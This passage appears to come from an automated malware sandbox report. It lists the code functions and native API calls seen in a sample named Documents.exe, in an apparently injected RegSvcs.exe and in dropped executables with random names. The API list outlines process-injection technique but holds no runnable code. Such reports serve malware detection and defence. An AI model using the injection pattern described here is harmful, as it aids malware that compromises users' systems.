                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522BF0 NtAllocateVirtualMemory,9_2_01522BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522BE0 NtQueryValueKey,9_2_01522BE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522B80 NtQueryInformationFile,9_2_01522B80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522BA0 NtEnumerateValueKey,9_2_01522BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522AD0 NtReadFile,9_2_01522AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522AF0 NtWriteFile,9_2_01522AF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522AB0 NtWaitForSingleObject,9_2_01522AB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522D10 NtMapViewOfSection,9_2_01522D10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522D00 NtSetInformationFile,9_2_01522D00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522D30 NtUnmapViewOfSection,9_2_01522D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522DD0 NtDelayExecution,9_2_01522DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522DB0 NtEnumerateKey,9_2_01522DB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522C60 NtCreateKey,9_2_01522C60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522C00 NtQueryInformationProcess,9_2_01522C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522CC0 NtQueryVirtualMemory,9_2_01522CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522CF0 NtOpenProcess,9_2_01522CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522CA0 NtQueryInformationToken,9_2_01522CA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522F60 NtCreateProcessEx,9_2_01522F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522F30 NtCreateSection,9_2_01522F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522FE0 NtCreateFile,9_2_01522FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522F90 NtProtectVirtualMemory,9_2_01522F90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522FB0 NtResumeThread,9_2_01522FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522FA0 NtQuerySection,9_2_01522FA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522E30 NtWriteVirtualMemory,9_2_01522E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522EE0 NtQueueApcThread,9_2_01522EE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522E80 NtReadVirtualMemory,9_2_01522E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522EA0 NtAdjustPrivilegesToken,9_2_01522EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01523010 NtOpenDirectoryObject,9_2_01523010
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01523090 NtSetValueKey,9_2_01523090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015239B0 NtGetContextThread,9_2_015239B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01523D70 NtOpenThread,9_2_01523D70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01523D10 NtOpenProcessToken,9_2_01523D10
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_031F43E80_2_031F43E8
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_031FE0940_2_031FE094
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_031F70510_2_031F7051
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F195180_2_05F19518
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F195080_2_05F19508
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F174900_2_05F17490
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F174810_2_05F17481
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F170580_2_05F17058
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F170490_2_05F17049
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F178C80_2_05F178C8
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F18B680_2_05F18B68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004186D39_2_004186D3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004168C39_2_004168C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E0C39_2_0040E0C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004100E39_2_004100E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004168BE9_2_004168BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004011B09_2_004011B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E25C9_2_0040E25C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00401A009_2_00401A00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E2079_2_0040E207
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E2139_2_0040E213
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402B509_2_00402B50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004043569_2_00404356
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042EDF39_2_0042EDF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040FEC39_2_0040FEC3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004026909_2_00402690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402F309_2_00402F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015781589_2_01578158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158A1189_2_0158A118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E01009_2_014E0100
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A81CC9_2_015A81CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B01AA9_2_015B01AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A41A29_2_015A41A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015820009_2_01582000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AA3529_2_015AA352
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B03E69_2_015B03E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE3F09_2_014FE3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015902749_2_01590274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015702C09_2_015702C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F05359_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B05919_2_015B0591
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A24469_2_015A2446
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015944209_2_01594420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159E4F69_2_0159E4F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015147509_2_01514750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F07709_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EC7C09_2_014EC7C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150C6E09_2_0150C6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015069629_2_01506962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A09_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015BA9A69_2_015BA9A6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F28409_2_014F2840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FA8409_2_014FA840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E8F09_2_0151E8F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D68B89_2_014D68B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AAB409_2_015AAB40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A6BD79_2_015A6BD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA809_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158CD1F9_2_0158CD1F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FAD009_2_014FAD00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EADE09_2_014EADE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01508DBF9_2_01508DBF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0C009_2_014F0C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0CF29_2_014E0CF2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01590CB59_2_01590CB5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01564F409_2_01564F40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01510F309_2_01510F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01592F309_2_01592F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01532F289_2_01532F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2FC89_2_014E2FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FCFE09_2_014FCFE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156EFA09_2_0156EFA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0E599_2_014F0E59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AEE269_2_015AEE26
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AEEDB9_2_015AEEDB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502E909_2_01502E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015ACE939_2_015ACE93
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015BB16B9_2_015BB16B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152516C9_2_0152516C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DF1729_2_014DF172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FB1B09_2_014FB1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F70C09_2_014F70C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159F0CC9_2_0159F0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A70E99_2_015A70E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AF0E09_2_015AF0E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DD34C9_2_014DD34C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A132D9_2_015A132D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0153739A9_2_0153739A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150B2C09_2_0150B2C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015912ED9_2_015912ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F52A09_2_014F52A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A75719_2_015A7571
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158D5B09_2_0158D5B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E14609_2_014E1460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AF43F9_2_015AF43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AF7B09_2_015AF7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A16CC9_2_015A16CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150B9509_2_0150B950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F99509_2_014F9950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015859109_2_01585910
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155D8009_2_0155D800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F38E09_2_014F38E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AFB769_2_015AFB76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01565BF09_2_01565BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152DBF99_2_0152DBF9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150FB809_2_0150FB80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AFA499_2_015AFA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A7A469_2_015A7A46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01563A6C9_2_01563A6C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159DAC69_2_0159DAC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01535AA09_2_01535AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158DAAC9_2_0158DAAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01591AA39_2_01591AA3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A1D5A9_2_015A1D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F3D409_2_014F3D40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A7D739_2_015A7D73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150FDC09_2_0150FDC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01569C329_2_01569C32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AFCF29_2_015AFCF2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AFF099_2_015AFF09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F1F929_2_014F1F92
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AFFB19_2_015AFFB1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F9EB09_2_014F9EB0
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_027443E810_2_027443E8
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_0274E09410_2_0274E094
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_0274705110_2_02747051
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055FF78810_2_055FF788
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055F41C410_2_055F41C4
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055F6D3210_2_055F6D32
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055FF77810_2_055FF778
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055F004010_2_055F0040
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055FC84010_2_055FC840
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055FC83010_2_055FC830
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055FCAD810_2_055FCAD8
                    Source: C:\Users\user\AppData\Roaming\uFEeKIucsX.exeCode function: 10_2_055FCAC710_2_055FCAC7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112010015_2_01120100
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0117600015_2_01176000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011B02C015_2_011B02C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113053515_2_01130535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0115475015_2_01154750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113077015_2_01130770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112C7C015_2_0112C7C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114C6E015_2_0114C6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114696215_2_01146962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011329A015_2_011329A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113284015_2_01132840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113A84015_2_0113A840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116889015_2_01168890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011168B815_2_011168B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0115E8F015_2_0115E8F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112EA8015_2_0112EA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113AD0015_2_0113AD00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113ED7A15_2_0113ED7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01148DBF15_2_01148DBF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01138DC015_2_01138DC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112ADE015_2_0112ADE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01130C0015_2_01130C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01120CF215_2_01120CF2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01150F3015_2_01150F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01172F2815_2_01172F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011A4F4015_2_011A4F40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011AEFA015_2_011AEFA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01122FC815_2_01122FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01130E5915_2_01130E59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01142E9015_2_01142E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111F17215_2_0111F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116516C15_2_0116516C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113B1B015_2_0113B1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111D34C15_2_0111D34C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011333F315_2_011333F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011352A015_2_011352A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114B2C015_2_0114B2C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114D2F015_2_0114D2F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112146015_2_01121460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113349715_2_01133497
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011774E015_2_011774E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113B73015_2_0113B730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113995015_2_01139950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114B95015_2_0114B950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113599015_2_01135990
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0119D80015_2_0119D800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011338E015_2_011338E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114FB8015_2_0114FB80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011A5BF015_2_011A5BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116DBF915_2_0116DBF9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011A3A6C15_2_011A3A6C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01133D4015_2_01133D40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114FDC015_2_0114FDC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011A9C3215_2_011A9C32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01149C2015_2_01149C20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01131F9215_2_01131F92
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01139EB015_2_01139EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042EDF315_2_0042EDF3
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029EEB5C16_2_029EEB5C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E635C16_2_029E635C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029EEB5716_2_029EEB57
